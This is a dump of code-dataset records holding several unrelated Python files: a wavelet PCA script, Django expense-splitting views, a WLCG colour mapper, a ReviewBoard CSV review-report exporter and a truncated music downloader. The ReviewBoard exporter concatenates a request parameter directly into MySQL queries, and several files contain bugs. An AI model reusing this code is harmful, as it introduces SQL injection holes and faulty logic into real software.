enumerate(session_name_tags):\n \n wavelet_array = np.load(save_folder_location + session[1] + '\\\\' + session[1] + '_wavelet' + twoD_suffix + '.npy')\n wavelet_array = np.reshape(wavelet_array, (39 * 39, wavelet_array.shape[2]))[relevant_wavelet_features,:].T\n \n # Compute the expansion coefficients\n pca_coeffs = pca.transform(wavelet_array) #input: (samples, features)\n \n # Save the coefficients\n pca_file_location = save_folder_location + session[1] + '\\\\' + session[1] + '_pca_coeffs_' + data_library_name_tag + twoD_suffix + '.npy'\n np.save(pca_file_location, pca_coeffs)\n\n \n\n\n\n", "sub_path": "superorganism-analysis/superorganism-learning/PCA.py", "file_name": "PCA.py", "file_ext": "py", "file_size_in_byte": 10671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition.PCA", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sklearn.decomposition", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 186, "usage_type": "call"}, {"api_name": "learning_funcs.reconstruct_from_wavelet", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 190, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 193, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition.PCA", "line_number": 208, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition", "line_number": 208, "usage_type": "attribute"}, {"api_name": "sklearn.decomposition", "line_number": 208, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 213, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "62191370", "text": "from django.shortcuts import render\nfrom .models import Group,Expense,Payment\nfrom django.shortcuts import render, get_object_or_404\nfrom .form import GroupForm,AddExpense,NameForm\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.core.exceptions import PermissionDenied \nfrom django.contrib.auth.models import User \nfrom django.shortcuts import redirect\n\ndef home(request):\n groups= Group.objects.all()\n return render(request, 'blog/home.html', {'groups':groups})\n\n\ndef group_detail(request, pk):\n group=get_object_or_404(Group,pk=pk)\n g2=Group.objects.filter(group_name=group.group_name).first()\n g3=Group.objects.filter(group_name=group.group_name).first()\n m2=group.members.all()\n g1=Expense.objects.filter(group__group_name=group.group_name)\n return render(request, 'blog/group_detail.html',{'expense':g1,'member':m2,'pk':pk})\n\ndef group_new(request):\n if request.method == \"POST\":\n form = GroupForm(request.POST)\n if form.is_valid():\n group_name = form.cleaned_data['group_name']\n g1=Group(group_name=group_name)\n g1.save()\n\n description = form.cleaned_data['description']\n total_amount = form.cleaned_data['total_amount']\n paid_by=form.cleaned_data['Paid_by']\n if not User.objects.filter(username=paid_by): \n return PermissionDenied\n u1=User.objects.filter(username=paid_by).first()\n g1.members.add(u1) \n e1=Expense(total_amount=total_amount,Payment=u1,description=description,group=g1)\n e1.save()\n count_amount=0\n member_name = form.cleaned_data['member_name']\n member_name=member_name.replace('-', ',').split(',')\n for member in member_name: \n if(member.isdigit()):\n a1=member \n count_amount+=int(a1) \n else:\n m1=member\n if not User.objects.filter(username=m1): \n return PermissionDenied\n member_amount=User.objects.filter(username=m1).first()\n g1.members.add(member_amount) \n continue\n \n p1=Payment(amount=a1,paid=member_amount,expense=e1,flag=False)\n p1.save()\n return redirect('group-detail',pk=g1.pk)\n\n else:\n form = GroupForm()\n return render(request, 'blog/group_edit.html', {'form': form})\n\ndef expense_detail(request, pk):\n expense=get_object_or_404(Expense,pk=pk)\n form = NameForm()\n e=Payment.objects.filter(expense__description=expense.description,expense__group__group_name=expense.group)\n return render(request, 'blog/expense_detail.html',{'expense':e,'form':form})\n\ndef expense_new(request,pk):\n if request.method == \"POST\":\n form = AddExpense(request.POST)\n if form.is_valid():\n group=get_object_or_404(Group,pk=pk)\n description = form.cleaned_data['description']\n total_amount = form.cleaned_data['total_amount']\n paid_by=form.cleaned_data['Paid_by']\n if not User.objects.filter(username=paid_by): \n return PermissionDenied\n u1=User.objects.filter(username=paid_by).first()\n e1=Expense(total_amount=total_amount,Payment=u1,description=description,group=group)\n e1.save()\n\n member_name = form.cleaned_data['member_name']\n member_name=member_name.replace('-', ',').split(',')\n for member in member_name: \n if(member.isdigit()):\n a1=member \n else:\n m1=member\n if not User.objects.filter(username=m1): \n return PermissionDenied\n member_amount=User.objects.filter(username=m1).first()\n group.members.add(member_amount) \n continue\n \n p1=Payment(amount=a1,paid=member_amount,expense=e1,flag=False)\n p1.save()\n return redirect('group-detail',pk=group.pk)\n else:\n form = AddExpense()\n return render(request, 'blog/add_expense.html', {'form': form})\n\n\ndef paid_members(request,pk):\n expense=get_object_or_404(Expense,pk=pk)\n if request.method == 'POST':\n form = NameForm(request.POST)\n if form.is_valid():\n d = form.cleaned_data['your_name']\n u1=User.objects.filter(username=d).first()\n u=Payment.objects.filter(paid=u1,expense=expense).first()\n u.flag=True\n u.save()\n return render(request, 'blog/expense_detail.html', {'form': form})\n\n\n\n\n \n\n\n \n\n \n\n\n\n ", "sub_path": "splitwise/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Group.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 16, "usage_type": "argument"}, {"api_name": "models.Group.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Group.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 18, "usage_type": "name"}, {"api_name": "models.Expense.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Expense.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Expense", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "form.GroupForm", "line_number": 25, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 26, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 28, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 31, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 32, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 34, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 35, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Expense", "line_number": 38, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 49, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 50, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 51, "usage_type": "name"}, {"api_name": "models.Payment", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 57, "usage_type": "call"}, {"api_name": "form.GroupForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Expense", "line_number": 64, "usage_type": "argument"}, {"api_name": "form.NameForm", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Payment.objects.filter", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Payment.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Payment", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "form.AddExpense", "line_number": 71, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 72, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 73, "usage_type": "argument"}, {"api_name": "form.cleaned_data", "line_number": 74, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 75, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 76, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 77, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 78, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Expense", "line_number": 80, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 90, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 91, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Payment", "line_number": 96, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "form.AddExpense", "line_number": 100, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 105, "usage_type": "call"}, {"api_name": "models.Expense", "line_number": 105, "usage_type": "argument"}, {"api_name": "form.NameForm", "line_number": 107, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 108, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 109, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 110, "usage_type": "name"}, {"api_name": "models.Payment.objects.filter", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Payment.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.Payment", "line_number": 111, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "538540994", "text": "#!/usr/bin/env python3\n\nimport sys\nimport json\nfrom urllib.request import urlopen\nimport subprocess\n\ndef apply_wlcg_mapping(grafana_dashboard_definition_filename):\n with open('grafana_color_scheme.ini', 'r') as f:\n color_scheme = f.read().split(',')\n \n urls = [\"http://wlcg-cric.cern.ch/api/core/rcsite/query/?json&state=ANY\",\n \"http://wlcg-cric.cern.ch/api/core/federation/query/?json\"]\n \n wlcg_mappings = set()\n \n for url in urls:\n response = urlopen(url)\n wlcg_data = response.read().decode(\"utf-8\")\n wlcg_data = json.loads(wlcg_data)\n \n wlcg_mappings.update(wlcg_data.keys())\n \n with open('colourmapper.ini', 'w') as f:\n f.write('[Colours]\\n')\n\n for index, obj in enumerate(wlcg_mappings):\n f.write(f'{obj} = {color_scheme[index % len(color_scheme)]}\\n')\n \n subprocess.call(['python3', 'colourmapper.py', grafana_dashboard_definition_filename])\n\nif __name__ == '__main__':\n apply_wlcg_mapping(sys.argv[1])\n", "sub_path": "wlcg_colourmapper.py", "file_name": "wlcg_colourmapper.py", "file_ext": "py", "file_size_in_byte": 1032, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urllib.request.urlopen", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "132090016", "text": "# This file handles the request from UI to get the details for a particular review\n#\n# It connects to the MySQL DB and returns the data in CSV format to the frontend.\n# The data format is similar to the 'Review Log Tracker' of HSC BMS.\n\nfrom reviewboard.webapi.base import WebAPIResource\nimport logging\nimport MySQLdb\nimport ast\nimport csv\nimport io\nfrom datetime import datetime\n\n\nDB_IP = '127.0.0.1'\nDB_PORT = 3306\nUSER = \"\"\nPASSWD = \"\"\nDB_NAME = \"\"\n\n# For data received from DB\ndata = []\n\n\nclass HscReportResourceExportCsv(WebAPIResource):\n \"\"\"HscReports class return hsc excel format.\"\"\"\n # name in web api link.\n name = 'hsc_export_csv'\n\n # name in api request.\n uri_name = 'export'\n\n # methods allowed for this resource.\n allowed_methods = ('GET', 'POST')\n logging.debug(\"Hello HSC Reports\")\n\n\n # hardcoded data\n ph_detect = 'Code Review (Internal)'\n ph_inject = ' '\n cause = ' '\n disp_pre = ' '\n fix_in_rev = ' '\n on_rev = ' '\n\n # Header for the CSV file\n header = ['S.No','Location','Phase Detected','Defect Severity','Description','Disposition (Pre-Meeting)',\n 'Disposition (Post-Meeting)','Disposition Comment','Date Approved','Date Closed',\n 'Fixed in Revision','Reviewer','Date Created','On Revision','Defect Category','Phase Injected',\n 'Defect Cause']\n\n # GET request handling.\n def get_list(self, request, *args, **kwargs):\n req_id = request.GET['req_id']\n comment_data = self.get_rvw_detail(req_id)\n return 200, {self.item_result_key: {'data': comment_data}}\n\n # POST request handling.\n def create(self, request, api_format, *args, **kwargs):\n logging.debug(\"POST: Hello HSC\")\n comment_data = self.get_rvw_detail(req_id)\n return 200, {self.item_result_key: {'data': comment_data}}\n\n\n # Convert the RB status to HSC report status\n def match_status(self, x):\n return {\n 'R': 'Accepted',\n 'D': 'Rejected',\n }.get(x, ' ')\n\n # Convert the RB category to HSC report category\n def match_category(self, x):\n return {\n 'std': 'Standards',\n 'func': 'Functional',\n 'poor': 'Poor Practice',\n 'logical': 'Logical',\n 'ppt': 'Presetation/Documantation',\n 'query': 'Query/Clarification/Recommendation',\n }.get(x, ' ')\n\n\n # Convert the RB severity to HSC report severity\n def match_severity(self, x):\n return {\n 'critical': 'Critical',\n 'major': 'Major',\n 'minor': 'Minor',\n 'enhancement': 'Enhancement',\n }.get(x, ' ')\n\n\n # Convert the RB cause to HSC BMS template\n def match_cause(self, x):\n return {\n 'requirement': 'Ambigous Requirements',\n 'design': 'Design Error',\n 'stdfollow': 'Standards not followed',\n 'stdupd': 'Standards needs updation',\n 'knowledge': 'Lack of Knowledge',\n 'oversight': 'Oversight',\n 'dataerr': 'Data Error',\n 'config': 'Incorrect Configuration',\n 'hardware': 'Hardware Issue',\n 'trace': 'Traceability Not followed',\n }.get(x, ' ')\n\n\n # Convert the RB phase injected to HSC BMS values\n def match_phase_injected(self, x):\n return {\n 'reqmt': 'Requirement',\n 'design': 'Design',\n 'code': 'Coding',\n 'test': 'Testing',\n }.get(x, ' ')\n\n #Fetch details for the given request Id of the given repository\n # Arguments:\n # rvwId:(number) \n # Return:\n # CSV formatted string\n #\n def get_rvw_detail(self, rvwId):\n\n try:\n csv_output = io.BytesIO()\n writer = csv.writer(csv_output)\n\n # Query to get the meta info of the review\n meta_info_query = \"select rr.summary, rr.time_added, au.first_name, au.last_name, scm.name \"\\\n \" from reviews_reviewrequest rr, auth_user au, scmtools_tool scm, scmtools_repository scm_repo \"\\\n \" where rr.submitter_id=au.id and rr.id=\" + str(rvwId) + \" and rr.repository_id=scm_repo.id \"\\\n \" and scm_repo.tool_id=scm.id\"\n\n logging.debug(\"meta_info_query:%s\",meta_info_query)\n\n # Open database connection\n db = MySQLdb.connect(DB_IP, USER, PASSWD, DB_NAME)\n\n # prepare a cursor object using cursor() method\n cursor = db.cursor()\n\n cursor.execute(meta_info_query)\n metadata = cursor.fetchall()\n\n # Write meta info to the buffer in CSV format\n writer.writerow([\"Review Title\", metadata[0][0]])\n writer.writerow([\"Author name\", metadata[0][2] + \" \" + metadata[0][3]])\n writer.writerow([\"Review Initiation Date\", metadata[0][1].strftime('%m/%d/%Y')])\n repo_type = metadata[0][4]\n logging.debug(\"repo type:%s\",repo_type)\n\n\n # Query to get the reviewers\n reviewer_info_query = \"select DISTINCT au.email \"\\\n \"from reviews_reviewrequest rr, reviews_reviewrequest_target_groups tg, \"\\\n \"reviews_group_users gu, auth_user au, reviews_reviewrequest_target_people tp \"\\\n \"where rr.id=\" + str(rvwId) + \" and \"\\\n \"((tg.reviewrequest_id=rr.id and gu.group_id=tg.group_id and au.id=gu.user_id) or \"\\\n \"(tp.reviewrequest_id=rr.id and tp.user_id=au.id))\"\n\n # prepare a cursor object using cursor() method\n cursor = db.cursor()\n cursor.execute(reviewer_info_query)\n reviewer_data = cursor.fetchall()\n\n reviewer_list = ''\n for list in reviewer_data:\n reviewer_list += list[0] + ','\n writer.writerow([\"Target Reviewers\", reviewer_list])\n\n # Query to get the number of file diffset and their timestamps\n # If num > 1, reviewee has uploaded a new diff.\n filediffset_query = \"select timestamp from diffviewer_diffset where history_id=\" + str(rvwId)\n\n cursor.execute(filediffset_query)\n data = cursor.fetchall()\n\n comment_fix_dtm = None\n if len(data) > 1:\n comment_fix_dtm = data[len(data)-1]\n\n # Query to get the ship time and date\n ship_info_query = \"select timestamp from reviews_review where ship_it=1 and review_request_id=\" + str(rvwId)\n\n cursor.execute(ship_info_query)\n data = cursor.fetchall()\n\n ship_dtm = None\n if len(data) > 0:\n ship_dtm = data[len(data)-1]\n\n # Query to get the diff revision information of the review\n rev_info_query = \"select rr.id as rid, ds.id as did, ds.revision, fd.id as fid, fd.dest_file, fd.dest_detail \\\n from reviews_reviewrequest rr, diffviewer_diffset ds, diffviewer_filediff fd \\\n where ds.id=fd.diffset_id \\\n and rr.diffset_history_id=ds.history_id \\\n and rr.id=\" + str(rvwId)\n\n cursor.execute(rev_info_query)\n rev_data = cursor.fetchall()\n\n # To safe-guard against any indexing errors\n try:\n if len(rev_data) > 1:\n if repo_type == 'Subversion':\n # Get the last one and strip the () chars\n self.fix_in_rev = rev_data[len(rev_data)-1][5][1:-1]\n elif repo_type == 'ClearCase': \n # Get the last one and get the version info\n file_name = rev_data[len(rev_data)-1][4]\n version_info_index = file_name.rfind('@') + 1\n self.fix_in_rev = file_name[version_info_index:]\n elif repo_type == 'Git': \n self.fix_in_rev = rev_data[len(rev_data)-1][5]\n else:\n logging.error('Unsupported repo type:%s',repo_type)\n except Exception as e:\n logging.error(\"********Error [%d]: %s\" % (e.args[0], e.args[1]))\n self.fix_in_rev = ' '\n\n # repo specific query conditions\n # In case of SVN, fetch the dest_detail\n\n\n # Query to get all the comments for this review\n all_data_query = \"select reviews_comment.id, au.first_name, au.last_name, \\\n reviews_comment.text, reviews_comment.issue_opened, \\\n reviews_comment.issue_status, reviews_comment.reply_to_id, reviews_comment.extra_data, \\\n reviews_comment.first_line, reviews_comment.num_lines, reviews_comment.timestamp, \\\n diffviewer_filediff.dest_file, diffviewer_filediff.dest_detail \\\n from ((((((reviews_review \\\n left join reviews_reviewrequest \\\n on reviews_review.review_request_id = reviews_reviewrequest.id) \\\n left join auth_user \\\n on auth_user.id = reviews_reviewrequest.submitter_id) \\\n left join reviews_review_comments \\\n on reviews_review.id = reviews_review_comments.review_id) \\\n left join reviews_comment \\\n on reviews_review_comments.comment_id = reviews_comment.id) \\\n left join auth_user au \\\n on au.id = reviews_review.user_id) \\\n left join diffviewer_filediff \\\n on diffviewer_filediff.id = reviews_comment.filediff_id) \\\n where reviews_review.review_request_id = \" + str(rvwId)\n\n cursor.execute(all_data_query)\n data = cursor.fetchall()\n db.close()\n\n # Write table header to the buffer in CSV format\n writer.writerow(self.header)\n except MySQLdb.Error as e:\n logging.error(\"********MySQL Error [%d]: %s\" % (e.args[0], e.args[1]))\n\n all_data={}\n comment_count = 1;\n for id, rvwr_fname, rvwr_lname, txt, is_issue, status, reply_id, ext_data, first_line, num_lines, ts, file, version in data:\n logging.debug(\"txt:%s, file:%s, version:%s\",txt,file,version)\n if is_issue:\n comment_data = {}\n comment_data['num'] = comment_count\n\n # Set the file name and On revision\n if repo_type == 'Subversion':\n # Get the last one and strip the () chars\n comment_data['on_rev'] = version[1:-1]\n elif repo_type == 'ClearCase': \n # Get the last one and get the version info\n version_info_index = file.rfind('@')\n comment_data['on_rev'] = file[version_info_index + 1:]\n file = file[:version_info_index - 1]\n elif repo_type == 'Git': \n comment_data['on_rev'] = version\n else:\n logging.error('Unsupported repotype:%s',repo_type)\n\n comment_data['loc'] = file + ':' + str(first_line)\n if num_lines > 1:\n comment_data['loc'] += '-' + str(first_line+num_lines-1)\n comment_data['reviewer'] = rvwr_fname + ' ' + rvwr_lname\n ext_data_dic = ast.literal_eval(ext_data)\n if 'severity' in ext_data_dic:\n comment_data['severity'] = self.match_severity(ext_data_dic[\"severity\"])\n else:\n comment_data['severity'] = ' ';\n if 'category' in ext_data_dic:\n comment_data['category'] = self.match_category(ext_data_dic[\"category\"])\n else:\n comment_data['category'] = ' ';\n if 'cause' in ext_data_dic:\n comment_data['cause'] = self.match_cause(ext_data_dic[\"cause\"])\n else:\n comment_data['cause'] = ' ';\n if 'phase' in ext_data_dic:\n comment_data['ph_inject'] = self.match_phase_injected(ext_data_dic[\"phase\"])\n else:\n comment_data['ph_inject'] = ' ';\n comment_data['desc'] = txt\n comment_data['disp'] = self.match_status(status)\n comment_data['create_dtm'] = ts.strftime('%m/%d/%Y')\n comment_data['disp_txt'] = ''\n all_data[str(id)] = comment_data\n if comment_fix_dtm is not None:\n comment_data['fix_date'] = comment_fix_dtm[0].strftime('%m/%d/%Y')\n else:\n comment_data['fix_date'] = ' '\n if ship_dtm is not None:\n comment_data['approve_date'] = ship_dtm[0].strftime('%m/%d/%Y')\n else:\n comment_data['approve_date'] = ' '\n\n comment_count = comment_count + 1\n else:\n if str(reply_id) in all_data:\n if (all_data[str(reply_id)]['disp_txt'] == ''):\n all_data[str(reply_id)]['disp_txt'] = rvwr_fname + ' ' + rvwr_lname + ': ' + txt\n else:\n # Append the reviewer name and his/her comment\n all_data[str(reply_id)]['disp_txt'] = all_data[str(reply_id)]['disp_txt'] + \\\n '\\n' + \\\n rvwr_fname + ' ' + rvwr_lname + ': ' + txt\n all_data[str(reply_id)]['fix_date'] = ts.strftime('%m/%d/%Y')\n\n\n # Write table contents to the buffer in CSV format\n for row in sorted(all_data):\n writer.writerow([all_data[row]['num'], all_data[row]['loc'], self.ph_detect, all_data[row]['severity'], \n all_data[row]['desc'], self.disp_pre, all_data[row]['disp'], all_data[row]['disp_txt'],\n all_data[row]['approve_date'], all_data[row]['fix_date'], self.fix_in_rev, all_data[row]['reviewer'],\n all_data[row]['create_dtm'], all_data[row]['on_rev'], all_data[row]['category'], all_data[row]['ph_inject'], all_data[row]['cause']])\n\n return csv_output.getvalue()\n\n\nhscreport_resource_export_csv = HscReportResourceExportCsv()\n", "sub_path": "hscreports/hscreports/resourceExportCsv.py", "file_name": "resourceExportCsv.py", "file_ext": "py", "file_size_in_byte": 14876, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "reviewboard.webapi.base.WebAPIResource", "line_number": 25, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 60, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 128, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 137, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 219, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 221, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 255, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 256, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 261, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 278, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 284, "usage_type": "call"}]} +{"seq_id": "466316253", "text": "import io\r\nimport os\r\nimport urllib.request\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nAUTHOR = 'Vu Dinh Anh'\r\nVERSION = '0.0.0'\r\n\r\nDEFAULT_PATH = 'CSN_downloader'\r\n\r\nDOWNLOAD_QUALITY = ['32kbps', '128kbps', '320kbps', '500kbps', 'Lossless']\r\n\r\n\r\ndef download_music_file(url):\r\n cwd = os.getcwd() # current working directory\r\n file_name = url.split('/')[-1]\r\n file_name = file_name[file_name.index('v5=') + 3:]\r\n file_name = urllib.request.unquote(file_name) # get file name, escape from URL pattern\r\n if not os.path.exists(cwd + '\\\\' + DEFAULT_PATH):\r\n os.makedirs(cwd + '\\\\' + DEFAULT_PATH)\r\n\r\n path_to_save = cwd + '\\\\' + DEFAULT_PATH + '\\\\' + file_name\r\n\r\n r = requests.get(url)\r\n with io.open(path_to_save, 'wb')as f:\r\n f.write(r.content)\r\n\r\n print(\"Downloaded :\" + file_name)\r\n\r\n\r\ndef get_download_url(page):\r\n content = get_page_content(url=page)\r\n soup = BeautifulSoup(content, 'html.parser')\r\n download_div = soup.find('div', attrs={'id': 'downloadlink2'}) # div contain all download option\r\n\r\n download_urls = list()\r\n anchor_tags = download_div.find_all('a')\r\n for anchor_tag in anchor_tags:\r\n download_urls.append(anchor_tag['href'])\r\n\r\n return download_urls\r\n\r\n\r\ndef get_page_content(url):\r\n return requests.get(url=url).content\r\n\r\n\r\ndef get_all_download_pages(content):\r\n soup = BeautifulSoup(content, 'html.parser')\r\n table = soup.find('table', attrs={'border': '0', 'class': 'tbtable'})\r\n all_anchor_tags = table.find_all('a', attrs={'target': '_blank'}) # only download link has 'taget' : '_blank' attr\r\n download_links = list() # for storing download_link\r\n for anchor_tag in all_anchor_tags:\r\n download_links.append(anchor_tag['href']) # get download link from 'a' tag\r\n return download_links\r\n\r\n\r\ndef main():\r\n # get url\r\n url = input(\"Enter url: \")\r\n\r\n content = 